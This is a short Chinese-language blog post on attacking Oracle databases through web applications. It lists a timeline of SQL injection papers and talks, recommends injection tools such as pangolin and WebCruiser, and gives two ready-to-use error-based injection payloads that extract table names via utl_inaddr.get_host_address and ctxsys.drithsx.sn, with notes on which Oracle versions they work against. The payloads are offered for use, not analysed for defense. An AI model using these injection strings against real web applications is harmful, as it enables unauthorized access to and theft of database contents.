Hacking Oracle From the Web

 

2005/02/03 《Advanced SQL Injection in Oracle databases》

2007/08/28 kj021320《ART OF WEB-SQL-INJECTION第2卷 ORACLE篇》

2008/01/12 linx《犀利的 oracle 注入技术》

2008/03/      剑心《Oracle web环境注射技术

2009/04/27 《Run OS commands via sql injection in web applications》

2009/04       sumit siddharth发布blogOracle privilege escalations from web app》

2009/08/      sumit siddharthdefcon上演讲《The Making of the 2nd sql injection worm》

2010/02/22   sumit siddharth发布《Hacking Oracle From Web 》

                        sumit siddharth(Sid)blog:http://www.notsosecure.com

 

推荐注入工具:pangolin/WebCruiserWVS/Safe3

 

Error Messages Enabled暴表:

'  or 1=utl_inaddr.get_host_address((select data from (selEct rownum as limit,table_name as data from user_tables) whEre limit =1)) aNd 's' lIke 's     //暴表名  (适用于Oracle 8/9/10g,不适用于Oracle11g

and ctxsys.drithsx.sn(1,(select TABLE_NAME  from (select ROWNUM,table_name from user_tables where rownum<=2 order by ROWNUM desc) where rownum<=1))=1--   //暴表名

你可能感兴趣的:(oracle,hacking)